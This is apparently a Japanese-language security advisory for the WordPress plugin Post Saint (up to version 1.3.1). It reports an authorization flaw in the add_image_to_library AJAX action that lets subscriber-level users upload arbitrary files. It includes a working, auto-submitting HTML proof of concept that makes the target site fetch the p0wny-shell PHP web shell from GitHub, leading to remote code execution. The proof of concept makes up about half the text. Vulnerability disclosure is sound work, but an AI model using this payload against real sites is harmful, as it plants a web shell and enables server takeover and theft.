
Post Saint: ChatGPT、GPT4、DALL-E、Stable Diffusion、Pexels、Dezgo AIテキスト&画像ジェネレーター <= 1.3.1 - 認証済み(購読者+)ユーザーによる任意ファイルアップロードを可能にする認可欠如
Post Saint: ChatGPT、GPT4、DALL-E、Stable Diffusion、Pexels、Dezgo AI Text & Image Generator <= 1.3.1 - 認証済み(購読者以上)に対する認可欠如による任意ファイルアップロード
WordPress用プラグイン「Post Saint: ChatGPT、GPT4、DALL-E、Stable Diffusion、Pexels、Dezgo AI Text & Image Generator」は、1.3.1までの全バージョンにおいて、add_image_to_library AJAXアクション関数に権限チェックとファイルタイプ検証が欠如しているため、任意のファイルアップロードに対して脆弱です。これにより、購読者レベル以上のアクセス権を持つ認証済み攻撃者が、リモートコード実行を可能にする任意のファイルをアップロードすることができます。
<html>
<body>
<form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="add_image_to_library" />
<input type="hidden" name="image_url" value="https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php" />
<input type="hidden" name="image_prompt" value="say hello" />
<input type="hidden" name="insert_prompt_media_library_fields" value="caption_description" />
<input type="hidden" name="image_generator" value="pexels" />
<input type="hidden" name="log_id" value="1667" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>